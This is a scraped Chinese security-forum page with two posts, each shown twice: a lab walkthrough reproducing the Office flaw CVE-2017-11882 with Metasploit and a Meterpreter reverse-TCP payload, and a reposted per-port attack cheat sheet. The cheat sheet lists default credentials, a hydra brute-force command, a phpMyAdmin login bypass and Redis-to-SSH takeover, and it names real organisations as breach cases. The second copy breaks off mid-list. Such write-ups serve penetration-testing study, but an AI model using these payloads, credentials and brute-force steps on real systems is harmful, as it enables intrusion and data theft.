CVE-2017-11882漏洞复现及个人体会

渗透测试wuyou 发表了文章 • 0 个评论 • 41 次浏览 • 3 天前 • 来自相关话题

漏洞概述:
     CVE-2017-11882是一个潜伏17年之久的可以通杀office 2003到2016的所有版本的漏洞,攻击者只需要给目标发送一个word文档并且这个文档被打开,那么攻击者就可以肆意进行创建后门等操作。
复现环境:
    windows 7
     kail linux
     office 2016
过程:
      1、开启metasploit
                       root@wuyou:~# msfconsole
     2、搜寻模块并使用
                       msf > search CVE-2017-11882                    
                       msf > use exploit/windows/smb/CVE-2017-11882 
这里我使用了网上找的另一个rb文件




      3、查看设置并填入
                        msf exploit(windows/smb/CVE-2017-11882) > show options




查询渗透机IP地址
                     root@wuyou:~# ifconfig




设置渗透机的IP地址
                     msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.1.103
设置payload:
                     msf exploit(windows/smb/CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
最后再设置路径

     4、开始攻击并把生成的doc文档在靶机中打开
                     msf exploit(windows/smb/CVE-2017-11882) > exploit









结语: 
1、win10可以在靶机进行打开计算器之类的操作,但是想获取更多权限就不行了




 
2、第一次复现漏洞的我收获最大的东西并不是上面这个漏洞,而是整个的复现过程出现的各种问题和找到的解决方法,当我第一次看到这个漏洞的介绍时我觉得这个复现过程是如此的简单,但是实际过程却困难重重,我从装WIN7开始到解决metasploit出现的问题和试验各个版本、不同的环境和不同的复现方式直到开始写这篇文章坐在电脑前就已经有两天了,但我的收获也多且零碎到我无法在这篇文章中全部讲出来,这都需要自己实际操作一遍。
 
       查看全部
漏洞概述:
     CVE-2017-11882是一个潜伏17年之久的可以通杀office 2003到2016的所有版本的漏洞,攻击者只需要给目标发送一个word文档并且这个文档被打开,那么攻击者就可以肆意进行创建后门等操作。
复现环境:
    windows 7
     kail linux
     office 2016
过程:
      1、开启metasploit
                       root@wuyou:~# msfconsole
     2、搜寻模块并使用
                       msf > search CVE-2017-11882                    
                       msf > use exploit/windows/smb/CVE-2017-11882 
这里我使用了网上找的另一个rb文件
1.png

      3、查看设置并填入
                        msf exploit(windows/smb/CVE-2017-11882) > show options
3.png

查询渗透机IP地址
                     root@wuyou:~# ifconfig
if.png

设置渗透机的IP地址
                     msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.1.103
设置payload:
                     msf exploit(windows/smb/CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
最后再设置路径

     4、开始攻击并把生成的doc文档在靶机中打开
                     msf exploit(windows/smb/CVE-2017-11882) > exploit
4.png

222.png


结语: 
1、win10可以在靶机进行打开计算器之类的操作,但是想获取更多权限就不行了
fail.png

 
2、第一次复现漏洞的我收获最大的东西并不是上面这个漏洞,而是整个的复现过程出现的各种问题和找到的解决方法,当我第一次看到这个漏洞的介绍时我觉得这个复现过程是如此的简单,但是实际过程却困难重重,我从装WIN7开始到解决metasploit出现的问题和试验各个版本、不同的环境和不同的复现方式直到开始写这篇文章坐在电脑前就已经有两天了,但我的收获也多且零碎到我无法在这篇文章中全部讲出来,这都需要自己实际操作一遍。
 
      

[转帖]端口渗透总结

渗透测试fireant 发表了文章 • 0 个评论 • 36 次浏览 • 2019-01-15 10:48 • 来自相关话题

实例连接大多没用直接去乌云镜像上搜标题
0x00 背景
在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生;
首先分享一份关于端口及他们对应的服务文件:https://yunpan.cn/cYyNXEpZNYvxQ 访问密码 983e
这里再分享一篇我曾经在百度文库提交的端口渗透文章:请点我
再次看这篇文章发现写的很简单,也只描述了几个常见的端口渗透;而且一般我们都是可以修 改默认端口的,所以平时在渗透过程中,对端口信息的收集就是一个很重要的过程;然后对症下药就可以更快的渗透进入我们需要的服务器;接下来就详细通过渗透 实战对端口的渗透进行更加深入的剖析;
端口渗透过程中我们需要关注几个问题:
1、  端口的banner信息
2、  端口上运行的服务
3、  常见应用的默认端口
当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap了吧!我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具;服务默认端口
公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务;
注册端口(Registered Ports):1024-49151,他们松散的绑定了一些服务;
动态/私有:49152-65535,不为服务分配这些端口;
当然这些端口都可以通过修改来达到欺骗攻击者的目的,但是这就安全了吗?攻击者又可以使用什么攻击方式来攻击这些端口呢?
还需要注明的一点是:很多木马工具也有特定的端口,本文并没有涉及到这块的内容,大家可以自己去收集收集!关于爆破之我见
在对这些端口进行实战讲解时,我需要先阐述一下我对爆破这个方式的一些看法;
爆破:技术最简单,需要的技术能力基本为0,工作效率与网络、硬件等相关,在我看来爆破其实是最强大的攻击方式,特别是结合一些特制的字典,结合社工我们可以在很短的时间达到最大的效果,只不过因为我们的pc或者字典不够强大,所以很多时候我们不能进行一次优秀的爆破攻击;当然现在很多web应用以及服务端口都限制了暴力破解;对于这种做了限制的我们可能就需要利用到本文提到的其他攻击了!
分享一个团队sai总结的字典:请点击
声明:本文总结的都是近两年的常见漏洞,以前的老版漏洞以及危害性不大的漏洞没有总结,望大家谅解!0x01 实战测试文件共享服务端口渗透ftp服务
FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等;
默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)
攻击方式:
爆破:ftp的爆破工具有很多,这里我推荐owasp的Bruter以及msf中ftp爆破模块;
匿名访问:用户名:anonymous  密码:为空或任意邮箱
用户名:FTP            密码:FTP或为空
用户名:USET         密码:pass
当然还有不需要用户名密码直接访问的,一般出现在局域网中;

嗅探:ftp使用明文传输技术(但是嗅探给予局域网并需要欺骗或监听网关)

后门技术:在linux的vsftp某一版本中,存在着一个后门程序,只要在用户名后面加上 就会在6200上打开一个监听Shell,我们可以使用telnet直接连接;详细请点击
远程溢出漏洞:6.10.1 IIS FTP远程溢出漏洞,在IIS FTP服务器中NLST命令存在一个缓冲区溢出漏洞,这个漏洞可能是攻击者在服务器运行一条非法命令。
跳转攻击:(Bounce Attacks)攻击者发送一个FTP”PORT”命令给目标FTP服务器,其中包含该主机的网络地址和被攻击的服务的端口号。这样,客户端就能命令FTP服务器发一个文件给被攻击的服务。这个文件可能包括根被攻击的服务有关的命令(如SMTP,NNTP等)。由于是命令第三方去连接到一种服务,而不是直接连接,就使得跟踪攻击者变得困难,并且还避开了基于网络地址的访问限制。(注:此种情况小白并没有遇到过,只是总结一下,欢迎大牛指教)
案例分享:
山东电信Serv-U Web客户端弱口令
长虹ftp弱口令导致全网数据泄漏NFS服务
nfs:网络文件系统,允许网络中的计算机通过TCP/IP网络共享资源。基于Linux系统,配置方面很简单,详细配置请参考案例分享。在nfs配置中,有不做任何限制的,有限制用户,有限制IP,以及在版本2.x中我们还可以使用证书来验证用户。当然不同的限制可以采用的攻击方式也不一样;就目前而言网上关于nfs的攻击还是比较少的!
默认端口:2049
攻击方式:
未授权访问:未限制IP以及用户权限设置错误
案例分享:
Nfs配置不当导致被入侵
NFS服务全攻略Samba服务
Samba服务:对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点;samba登录分为两种方式,一种是需要用户名口令;另一种是不需要用户名口令。在很多时候不光是pc机,还有一些服务器,网络设备都开放着此服务,方便进行文件共享,但是同时也给攻击者提供了便利。
默认端口:137(主要用户NetBIOS Name Service;NetBIOS名称服务)、139(NetBIOS Session Service,主要提供samba服务)
攻击方式:
爆破:弱口令(爆破工具采用hydra)hydra -l username -P
PassFile IP smb
未授权访问:给予public用户高权限
远程代码执行漏洞:CVE-2015-0240等等
案例分享:
Samba远程代码执行漏洞
未授权访问文件系统漏洞LDAP协议
ldap:轻量级目录访问协议,最近几年随着ldap的广泛使用被发现的漏洞也越来越多。但是毕竟主流的攻击方式仍旧是那些,比如注入,未授权等等;这些问题的出现也都是因为配置不当而造成的。
默认端口:389
攻击方式:
注入攻击:盲注
未授权访问:
爆破:弱口令
案例分享:
LDAP注入与防御剖析
欧朋LDAP服务匿名访问
使用LDAP查询快速提升域权限远程连接服务端口渗透SSH服务
SSH服务:这个服务基本会出现在我们的Linux服务器,网络设备,安全设备等设备上,而且很多时候这个服务的配置都是默认的;对于SSH服务我们可能使用爆破攻击方式较多。
默认端口:22
攻击方式
爆破:弱口令、
漏洞:28退格漏洞、OpenSSL漏洞
案例分享:
安宇创新科技ssh弱口令
宜信贷某站存在OpenSSL漏洞Telnet服务
Telnet服务:在SSH服务崛起的今天我们已经很难见到使用telnet的服务器,但是在很多设备上同样还是有这个服务的;比如cisco、华三,深信服等厂商的设备;我就有很多次通过telnet弱口令控制这些设备;
默认端口:23
攻击方式
爆破:弱口令
嗅探:此种情况一般发生在局域网;
案例分享:
大量惠普打印机远程telnet可被查看和操作Windows远程连接
远程桌面连接:作为windows上进行远程连接的端口,很多时候我们在得到系统为windows的shell的时候我们总是希望可以登录3389实际操作对方电脑;这个时候我们一般的情况分为两种。一种是内网,需要先将目标机3389端口反弹到外网;另一种就是外网,我们可以直接访问;当然这两种情况我们利用起来可能需要很苛刻的条件,比如找到登录密码等等;
默认端口:3389
攻击方式:
爆破:3389端口爆破工具就有点多了
Shift粘滞键后门:5次shift后门
3389漏洞攻击:利用ms12-020攻击3389端口,导致服务器关机;请参考VNC服务
VNC:一款优秀的远控工具,常用语类UNIX系统上,简单功能强大;也
默认端口:5900+桌面ID(5901;5902)
攻击方式:
爆破:弱口令
认证口令绕过:
拒绝服务攻击:(CVE-2015-5239)
权限提升:(CVE-2013-6886)
案例分享:
广西电信客服服务器使用VNC存在弱口令可直接控制Pcanywhere服务
PyAnywhere服务:一款远控工具,有点类似vnc的功能;这个服务在以前很多黑客发的视频里面都有,利用pcanywhere来进行提权;
默认端口:5632
攻击方式:
提权控制服务:
拒绝服务攻击:
代码执行:请参考
案例分享:
黑龙江物价局多处安全漏洞可能导致服务器沦陷(pcAnywhere提权+密码突破)Web应用服务端口渗透
HTTP服务:对于http服务其实是我们目前这几年比较常见的攻击入口,所以这里会针对http服务进行一个详细的详解;
注:这个板块的所有攻击方式,如果涉及到常规的web漏洞不会提出来,除非是特定的服务器才会产生的漏洞;IIS服务
默认端口:80/81/443
攻击方式:
IIS
PUT写文件:利用IIS漏洞,put方法直接将文件放置到服务器上
短文件名泄漏:这种一般没啥影响
解析漏洞:详细见apache服务
案例分享:
徐州市教育系统大量IIS PUT漏洞
用友软件IIS写权限(PUT)导致可获取webshell控制服务器
国家电网某分站存在iis短文件名漏洞Apache/Tomcat/Nginx/Axis2
默认端口:80/8080
攻击方式:
爆破:弱口令(爆破manager后台)
HTTP慢速攻击:可以把服务器打死,对一些大型的网站有影响;
解析漏洞:请参考
案例分享:
安卓开发平台存在上传漏洞和Apache解析漏洞,成功获取webshell
腾讯分站 Apache 漏洞WebLogic
默认端口:7001
攻击方式:
爆破:弱口令 4组:用户名密码均一致:system weblogic(密码可能weblogic123) portaladmin guest
Congsole后台部署webshell:
Java反序列化:
泄漏源代码/列目录:这个太老了,估计网上都没有了吧!
SSRF窥探内网:央视网SSRF可窥探内网
案列分享:
福建省人力资源和社会保障厅下属某WEBLOGIC弱口令
利用Weblogic进行入侵的一些总结Jboss
默认端口8080;其他端口1098/1099/4444/4445/8080/8009/8083/8093
攻击方式:
爆破:弱口令(爆破jboss系统后台)
远程代码执行:由于配置不当造成
Java反序列化:
案例分享
中华人民共和国民政部JBoss配置不当
JBOSS安全问题总结
中国科学院某处jboss应用漏洞Websphere
默认端口:908*;第一个应用就是9080,第二个就是9081;控制台9090
攻击方式:
爆破:弱口令(控制台)
任意文件泄漏:(CVE-2014-0823)
Java反序列化
案例分享:
中国电信某通用型业务系统(Websphere)GetShell漏洞
大汉网络有限公司远程命令执行漏洞(WebSphere案例)GlassFish
默认端口:http 8080;IIOP 3700;控制台4848
攻击方式:
爆破:弱口令(对于控制台)
任意文件读取:
认证绕过:
案例分享:
应用服务器glassfish存在通用任意文件读取漏洞
Oracle GlassFish Server认证绕过Jenkins
默认端口:8080、8089
攻击方式:
爆破:弱口令(默认管理员)
未授权访问:
反序列化:
案例分享:
酷6Jenkins系统未授权访问可执行系统命令Resin
默认端口:8080
攻击方式:
目录遍历
远程文件读取
案例分享:
爱奇艺Resin配置漏洞
Resin漏洞利用案例之目录遍历/以金蝶某系统为例Jetty
默认端口:8080
攻击方式:
远程共享缓冲区溢出Lotus
影响的都是一些大型的企业,特别需要注意,经过以前的测试发现弱口令这个问题经常都存在,可能是很多管理员不知道如何去修改(不要打我)。
默认端口:1352
攻击方式:
爆破:弱口令(admin password)控制台
信息泄露
跨站脚本攻击
案例分享:
Lotus Domino WebMail一处越权访问
中电投集团某系统弱口令直达内网涉及/OA系统/内部邮箱/财务系统/人力资源系统
中国某大型金融机构地方业务弱口令导致数万商户信息泄露&访问Lotus Domino后台数据库服务端口渗透
针对所有的数据库攻击方式都存在SQL注入,这里先提出来在下面就不一一写了免得大家说我占篇幅;当然不同的数据库注入技巧可能不一样,特别是NoSQL与传统的SQL数据库不太一样。但是这不是本文需要介绍的重点,后面有时间会写一篇不同数据库的渗透技巧。MySQL数据库
默认端口:3306
攻击方式:
爆破:弱口令
身份认证漏洞:CVE-2012-2122
拒绝服务攻击:利用sql语句是服务器进行死循环打死服务器
Phpmyadmin万能密码绕过:用户名:‘localhost’@’@”  密码任意
案例分享:
漏洞分享
和讯网某站点存在mysql注入漏洞
MySQL提权总结MSSQL数据库
默认端口:1433(Server 数据库服务)、1434(Monitor 数据库监控)
攻击方式:
爆破:弱口令/使用系统用户
案例分享:
MSSQL注射总结
上海安脉综合管理系统mssql注射漏洞
解密MSSQL连接数据库密码
从攻击MSSQL到提权: 使用msf针对mssql的一次完整渗透Oracle数据库
默认端口:1521(数据库端口)、1158(Oracle EMCTL端口)、8080(Oracle XDB数据库)、210(Oracle XDB FTP服务)
攻击方式:
爆破:弱口令
注入攻击;
漏洞攻击;
案例分享:
Oracle盲注结合XXE漏洞远程获取数据PostgreSQL数据库
PostgreSQL是一种特性非常齐全的自由软件的对象–关系型数据库管理系统,可以说是目前世界上最先进,功能最强大的自由数据库管理系统。包括我们kali系统中msf也使用这个数据库;浅谈postgresql数据库攻击技术  大部分关于它的攻击依旧是sql注入,所以注入才是数据库不变的话题。
默认端口:5432
攻击方式:
爆破:弱口令:postgres postgres
缓冲区溢出:CVE-2014-2669
案例分享:
Hacking postgresql
关于postgresql的那些事MongoDB数据库
MongoDB:NoSQL数据库;攻击方法与其他数据库类似;关于它的安全讲解:请参考
默认端口:27017
攻击方式:
爆破:弱口令
未授权访问;github有攻击代码;请点击
案例分享:
MongoDB phpMoAdmin远程代码执行
搜狐MongoDB未授权访问
新浪微米未授权访问
解决MongoDB各种隐患问题Redis数据库
redis:是一个开源的使用c语言写的,支持网络、可基于内存亦可持久化的日志型、key-value数据库。关于这个数据库这两年还是很火的,暴露出来的问题也很多。特别是前段时间暴露的未授权访问。Exp:https://yunpan.cn/cYjzHxawFpyVt  访问密码 e547
默认端口:6379
攻击方式:
爆破:弱口令
未授权访问+配合ssh key提权;
案例分享:
中国铁建网redis+ssh-keygen免认证登录SysBase数据库
默认端口:服务端口5000;监听端口4100;备份端口:4200
攻击方式:
爆破:弱口令
命令注入:
案例分享:
广西自考信息系统Sybase数据库注入
Sybase EAServer命令注入漏洞DB2数据库
默认端口:5000
攻击方式:
安全限制绕过:成功后可执行未授权操作(CVE-2015-1922)
案例分享:
哈尔滨银行主站DB2注入
总结一下:对于数据库,我们得知端口很多时候可以帮助我们去渗透,比如得知mysql的 数据库,我们就可以使用SQL注入进行mof、udf等方式提权;如果是mssql我们就可以使用xp_cmdshell来进行提权;如果是其它的数据 库,我们也可以采用对应的方式;比如各大数据库对应它们的默认口令,版本对应的漏洞!
顺便提一下:很多时候银行企业采用的都是oracle、db2等大型数据库;邮件服务端口渗透SMTP协议
smtp:邮件协议,在linux中默认开启这个服务,可以向对方发送钓鱼邮件!
默认端口:25(smtp)、465(smtps)
攻击方式:
爆破:弱口令
未授权访问
案例分享:
腾讯邮箱smtp注册时间限制绕过漏洞
邮件伪造详解
qq邮箱伪造发件地址,容易被钓鱼利用
众多厂商邮件系统配置不当可伪造邮件人POP3协议
默认端口:109(POP2)、110(POP3)、995(POP3S)
攻击方式:
爆破;弱口令
未授权访问;
案例分享:
中国联通沃邮箱等部分Android客户端免密码登陆(可获取任意联通用户pop3密码)
中航信邮箱密码泄漏及VPN账号和大量邮箱弱口令导致可内网漫游拿到域控IMAP协议
默认端口:143(imap)、993(imaps)
攻击方式:
爆破:弱口令
配置不当
案例分享:
163邮箱二次验证饶过缺陷
南方周末邮件服务器任意文件读取漏洞网络常见协议端口渗透DNS服务
默认端口:53
攻击方式:
区域传输漏洞
见2中的总结
案例分享:
全球Top1000Websites中存在DNS区域传送漏洞的网站列表
团购王某站DNS域传送漏洞
DNS泛解析与内容投毒DHCP服务
默认端口:67&68、546(DHCP Failover做双机热备的)
攻击方式:
DHCP劫持;
见2中总结
案例分享:
流氓DHCP服务器内网攻击测试SNMP协议
默认端口:161
攻击方式:
爆破:弱口令
案例分享:
snmp弱口令引起的信息泄漏
基于snmp的反射攻击的理论及其实现
华为某服务器SNMP弱口令其他端口渗透Hadoop文件服务
默认端口:请参考
案例分享:
Apache Hadoop远程命令执行
新浪漏洞系列第六弹–大量hadoop应用对外访问Zookeeper服务
zookeeper:分布式的,开放源码的分布式应用程序协调服务;提供功能包括:配置维护、域名服务、分布式同步、组服务等。详情请参考百度百科
默认端口:2181
攻击方式:
未授权访问;
案例分享:
zookeeper未授权访问漏洞
网上关于这方面的案例暂时不多,但是对于大数据逐渐泛滥的今天,这些漏洞未来会在乌云上出现一大波!Zabbix服务
zabbix:基于Web界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。监视各种网络参数,保证服务器系统的安全运营。
默认端口:8069
攻击方式:
远程命令执行:
案例分享:
当渗透遇到zabbix–小谈zabbix安全
Zabbix的前台SQL注射漏洞利用
网易zabbix运维不当,导致任意命令执行。(可提权、可内网渗透)elasticsearch服务
elasticsearch:请百度(因为我觉得我解释不清楚)
默认端口:9200()、9300()
攻击方式:
未授权访问;
远程命令执行;
文件遍历;
低版本webshell植入;
案例分享:
ElasticSearch 远程代码执行漏洞
elasticsearch 漏洞利用工具memcache服务
默认端口:11211
案例分享:
Memcache安全配置
memcache 未授权访问漏洞Linux R服务
R服务:TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问(标准的,rhosts + +)。
默认端口:512(remote process execution);513(remote login a la
telnet);514(cmd)
攻击方式:
使用rlogin直接登录对方系统;RMI
RMI:我们使用这两个端口很少的原因是因为必须是java,而且rmi穿越防火墙并不好穿越;这里我不会去涉及其他的东西,这里提出RMI只是因为在前段时间的java反序列化中,我们的小伙伴Bird写过一个weblogic利用工具,里面涉及到了RMI的一些东西,在有的时候使用socket不能成功时,我们可以使用RMI方式来进行利用;
默认端口:1090()、1099()
攻击方式:
远程命令执行(java反序列化,调用rmi方式执行命令)
这就是RMI的魅力了!
工具下载:请点我Rsync服务
Rsync:类UNIX系统下的数据备份工具(remote sync),属于增量备份;关于它的功能,大家自行百度百科吧,其实上面很多大家也看到了说是端口渗透,其实就是端口对应服务的渗透,服务一般出错就在配置或者版本问题上,rsync也不例外。Rsync默认允许匿名访问,如果在配置文件中没有相关的用户认证以及文件授权,就会触发隐患。
默认端口:873
攻击方式:
未授权访问;
本地提权:rsync默认以root运行,利用rsync上传一个文件,只要这个文件具有s权限,我们执行我们的攻击脚本就可以具有root权限。详细请参考和参考二
案例分享:
搜狐几处rsync未授权访问Socket代理
默认端口:1080
Socket代理针对代理来说没有什么漏洞,一般只是在渗透过程中作为我们的代理,进入内网,或者渗透域和林的时候有帮助。这里不做过多描述,但是可以尝试爆破一下代理的用户名和密码,万一运气好能登录,不也~~~~
案例分享:
利用php socket5代理渗透内网0x02 总结两句图解端口渗透端口号端口说明攻击技巧21/22/69ftp/tftp:文件传输协议爆破
嗅探
溢出;后门22ssh:远程连接爆破
OpenSSH;28个退格23telnet:远程连接爆破
嗅探25smtp:邮件服务邮件伪造53DNS:域名系统DNS区域传输
DNS劫持
DNS缓存投毒
DNS欺骗
深度利用:利用DNS隧道技术刺透防火墙67/68dhcp劫持
欺骗110pop3爆破139samba爆破
未授权访问
远程代码执行143imap爆破161snmp爆破389ldap注入攻击
未授权访问512/513/514linux r直接使用rlogin873rsync未授权访问1080socket爆破:进行内网渗透1352lotus爆破:弱口令
信息泄漏:源代码1433mssql爆破:使用系统用户登录
注入攻击1521oracle爆破:TNS
注入攻击2049nfs配置不当2181zookeeper未授权访问3306mysql爆破
拒绝服务
注入3389rdp爆破
Shift后门4848glassfish爆破:控制台弱口令
认证绕过5000sybase/DB2爆破
注入5432postgresql缓冲区溢出
注入攻击
爆破:弱口令5632pcanywhere拒绝服务
代码执行5900vnc爆破:弱口令
认证绕过6379redis未授权访问
爆破:弱口令7001weblogicJava反序列化
控制台弱口令
控制台部署webshell80/443/8080web常见web攻击
控制台爆破
对应服务器版本漏洞8069zabbix远程命令执行9090websphere控制台爆破:控制台弱口令
Java反序列9200/9300elasticsearch远程代码执行11211memcacache未授权访问27017mongodb爆破
未授权访问 查看全部
实例连接大多没用直接去乌云镜像上搜标题
0x00 背景
在前段时间的渗透中,我发现通过端口来进行渗透有时会提升我们的效率,所以才有了这篇文章的诞生;
首先分享一份关于端口及他们对应的服务文件:https://yunpan.cn/cYyNXEpZNYvxQ 访问密码 983e
这里再分享一篇我曾经在百度文库提交的端口渗透文章:请点我
再次看这篇文章发现写的很简单,也只描述了几个常见的端口渗透;而且一般我们都是可以修 改默认端口的,所以平时在渗透过程中,对端口信息的收集就是一个很重要的过程;然后对症下药就可以更快的渗透进入我们需要的服务器;接下来就详细通过渗透 实战对端口的渗透进行更加深入的剖析;
端口渗透过程中我们需要关注几个问题:
1、  端口的banner信息
2、  端口上运行的服务
3、  常见应用的默认端口
当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap了吧!我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具;服务默认端口
公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务;
注册端口(Registered Ports):1024-49151,他们松散的绑定了一些服务;
动态/私有:49152-65535,不为服务分配这些端口;
当然这些端口都可以通过修改来达到欺骗攻击者的目的,但是这就安全了吗?攻击者又可以使用什么攻击方式来攻击这些端口呢?
还需要注明的一点是:很多木马工具也有特定的端口,本文并没有涉及到这块的内容,大家可以自己去收集收集!关于爆破之我见
在对这些端口进行实战讲解时,我需要先阐述一下我对爆破这个方式的一些看法;
爆破:技术最简单,需要的技术能力基本为0,工作效率与网络、硬件等相关,在我看来爆破其实是最强大的攻击方式,特别是结合一些特制的字典,结合社工我们可以在很短的时间达到最大的效果,只不过因为我们的pc或者字典不够强大,所以很多时候我们不能进行一次优秀的爆破攻击;当然现在很多web应用以及服务端口都限制了暴力破解;对于这种做了限制的我们可能就需要利用到本文提到的其他攻击了!
分享一个团队sai总结的字典:请点击
声明:本文总结的都是近两年的常见漏洞,以前的老版漏洞以及危害性不大的漏洞没有总结,望大家谅解!0x01 实战测试文件共享服务端口渗透ftp服务
FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软件来配置,比如Serv-U还有一些网上写的简易ftp服务器等;
默认端口:20(数据端口);21(控制端口);69(tftp小型文件传输协议)
攻击方式:
爆破:ftp的爆破工具有很多,这里我推荐owasp的Bruter以及msf中ftp爆破模块;
匿名访问:用户名:anonymous  密码:为空或任意邮箱
用户名:FTP            密码:FTP或为空
用户名:USET         密码:pass
当然还有不需要用户名密码直接访问的,一般出现在局域网中;

嗅探:ftp使用明文传输技术(但是嗅探给予局域网并需要欺骗或监听网关)

后门技术:在linux的vsftp某一版本中,存在着一个后门程序,只要在用户名后面加上 就会在6200上打开一个监听Shell,我们可以使用telnet直接连接;详细请点击
远程溢出漏洞:6.10.1 IIS FTP远程溢出漏洞,在IIS FTP服务器中NLST命令存在一个缓冲区溢出漏洞,这个漏洞可能是攻击者在服务器运行一条非法命令。
跳转攻击:(Bounce Attacks)攻击者发送一个FTP”PORT”命令给目标FTP服务器,其中包含该主机的网络地址和被攻击的服务的端口号。这样,客户端就能命令FTP服务器发一个文件给被攻击的服务。这个文件可能包括根被攻击的服务有关的命令(如SMTP,NNTP等)。由于是命令第三方去连接到一种服务,而不是直接连接,就使得跟踪攻击者变得困难,并且还避开了基于网络地址的访问限制。(注:此种情况小白并没有遇到过,只是总结一下,欢迎大牛指教)
案例分享:
山东电信Serv-U Web客户端弱口令
长虹ftp弱口令导致全网数据泄漏NFS服务
nfs:网络文件系统,允许网络中的计算机通过TCP/IP网络共享资源。基于Linux系统,配置方面很简单,详细配置请参考案例分享。在nfs配置中,有不做任何限制的,有限制用户,有限制IP,以及在版本2.x中我们还可以使用证书来验证用户。当然不同的限制可以采用的攻击方式也不一样;就目前而言网上关于nfs的攻击还是比较少的!
默认端口:2049
攻击方式:
未授权访问:未限制IP以及用户权限设置错误
案例分享:
Nfs配置不当导致被入侵
NFS服务全攻略Samba服务
Samba服务:对于这个可以在windows与Linux之间进行共享文件的服务同样是我们攻击的关注点;samba登录分为两种方式,一种是需要用户名口令;另一种是不需要用户名口令。在很多时候不光是pc机,还有一些服务器,网络设备都开放着此服务,方便进行文件共享,但是同时也给攻击者提供了便利。
默认端口:137(主要用户NetBIOS Name Service;NetBIOS名称服务)、139(NetBIOS Session Service,主要提供samba服务)
攻击方式:
爆破:弱口令(爆破工具采用hydra)hydra -l username -P
PassFile IP smb
未授权访问:给予public用户高权限
远程代码执行漏洞:CVE-2015-0240等等
案例分享:
Samba远程代码执行漏洞
未授权访问文件系统漏洞LDAP协议
ldap:轻量级目录访问协议,最近几年随着ldap的广泛使用被发现的漏洞也越来越多。但是毕竟主流的攻击方式仍旧是那些,比如注入,未授权等等;这些问题的出现也都是因为配置不当而造成的。
默认端口:389
攻击方式:
注入攻击:盲注
未授权访问:
爆破:弱口令
案例分享:
LDAP注入与防御剖析
欧朋LDAP服务匿名访问
使用LDAP查询快速提升域权限远程连接服务端口渗透SSH服务
SSH服务:这个服务基本会出现在我们的Linux服务器,网络设备,安全设备等设备上,而且很多时候这个服务的配置都是默认的;对于SSH服务我们可能使用爆破攻击方式较多。
默认端口:22
攻击方式
爆破:弱口令、
漏洞:28退格漏洞、OpenSSL漏洞
案例分享:
安宇创新科技ssh弱口令
宜信贷某站存在OpenSSL漏洞Telnet服务
Telnet服务:在SSH服务崛起的今天我们已经很难见到使用telnet的服务器,但是在很多设备上同样还是有这个服务的;比如cisco、华三,深信服等厂商的设备;我就有很多次通过telnet弱口令控制这些设备;
默认端口:23
攻击方式
爆破:弱口令
嗅探:此种情况一般发生在局域网;
案例分享:
大量惠普打印机远程telnet可被查看和操作Windows远程连接
远程桌面连接:作为windows上进行远程连接的端口,很多时候我们在得到系统为windows的shell的时候我们总是希望可以登录3389实际操作对方电脑;这个时候我们一般的情况分为两种。一种是内网,需要先将目标机3389端口反弹到外网;另一种就是外网,我们可以直接访问;当然这两种情况我们利用起来可能需要很苛刻的条件,比如找到登录密码等等;
默认端口:3389
攻击方式:
爆破:3389端口爆破工具就有点多了
Shift粘滞键后门:5次shift后门
3389漏洞攻击:利用ms12-020攻击3389端口,导致服务器关机;请参考VNC服务
VNC:一款优秀的远控工具,常用语类UNIX系统上,简单功能强大;也
默认端口:5900+桌面ID(5901;5902)
攻击方式:
爆破:弱口令
认证口令绕过:
拒绝服务攻击:(CVE-2015-5239
权限提升:(CVE-2013-6886)
案例分享:
广西电信客服服务器使用VNC存在弱口令可直接控制Pcanywhere服务
PyAnywhere服务:一款远控工具,有点类似vnc的功能;这个服务在以前很多黑客发的视频里面都有,利用pcanywhere来进行提权;
默认端口:5632
攻击方式:
提权控制服务:
拒绝服务攻击:
代码执行:请参考
案例分享:
黑龙江物价局多处安全漏洞可能导致服务器沦陷(pcAnywhere提权+密码突破)Web应用服务端口渗透
HTTP服务:对于http服务其实是我们目前这几年比较常见的攻击入口,所以这里会针对http服务进行一个详细的详解;
注:这个板块的所有攻击方式,如果涉及到常规的web漏洞不会提出来,除非是特定的服务器才会产生的漏洞;IIS服务
默认端口:80/81/443
攻击方式:
IIS
PUT写文件:利用IIS漏洞,put方法直接将文件放置到服务器上
短文件名泄漏:这种一般没啥影响
解析漏洞:详细见apache服务
案例分享:
徐州市教育系统大量IIS PUT漏洞
用友软件IIS写权限(PUT)导致可获取webshell控制服务器
国家电网某分站存在iis短文件名漏洞Apache/Tomcat/Nginx/Axis2
默认端口:80/8080
攻击方式:
爆破:弱口令(爆破manager后台)
HTTP慢速攻击:可以把服务器打死,对一些大型的网站有影响;
解析漏洞:请参考
案例分享:
安卓开发平台存在上传漏洞和Apache解析漏洞,成功获取webshell
腾讯分站 Apache 漏洞WebLogic
默认端口:7001
攻击方式:
爆破:弱口令 4组:用户名密码均一致:system weblogic(密码可能weblogic123) portaladmin guest
Congsole后台部署webshell:
Java反序列化:
泄漏源代码/列目录:这个太老了,估计网上都没有了吧!
SSRF窥探内网:央视网SSRF可窥探内网
案列分享:
福建省人力资源和社会保障厅下属某WEBLOGIC弱口令
利用Weblogic进行入侵的一些总结Jboss
默认端口8080;其他端口1098/1099/4444/4445/8080/8009/8083/8093
攻击方式:
爆破:弱口令(爆破jboss系统后台)
远程代码执行:由于配置不当造成
Java反序列化:
案例分享
中华人民共和国民政部JBoss配置不当
JBOSS安全问题总结
